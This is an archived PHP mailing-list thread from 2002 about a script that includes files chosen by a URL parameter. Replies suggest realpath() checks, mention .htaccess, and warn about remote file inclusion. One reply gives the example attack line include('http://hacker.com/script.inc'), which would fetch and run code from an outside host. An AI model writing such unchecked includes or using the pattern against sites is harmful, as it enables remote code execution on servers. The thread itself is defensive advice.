That would not help you if you include files based on unchecked user input.
Justin French wrote:
>all my include files are *.inc, and I have a .htaccess file that makes
>apache refuse to serve those files directly thru http.
>
>Justin
>
>
>on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
>
>
>
>>erm......would that alow hackers access? Say I have a database include file
>>would hackers be able to get access to my database like this?
>>
>>(include('http://mysite.com/datainc.php');)
>>
>>I hope bloody not!!! if so how on earth do i get round that!
>>
>>John
>>
>>On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
>>
>>
>>>Use realpath() to check the path. I also suspect your script is
>>>vulnarable to cross-site includes
>>>(include('http://hacker.com/script.inc');)
>>>
>>>Rick Beckman wrote:
>>>
>>>
>>>>Okay, I was mistaken... There is a gaping security hole in my simple li'l
>>>>script... How do I modify it to only accept files from a certain path? I
>>>>want the url format to be script.php?call=1 where "1" is the called file
>>>>in the /includes/ directory. Just when I get optimistic I leave the
>>>>entire system exposed. Yeah, that fits with my luck. :-)
>>>>
>>>>
>>--
>>PHP General Mailing List (http://www.php.net/)
>>To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>>
>
>
>
>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
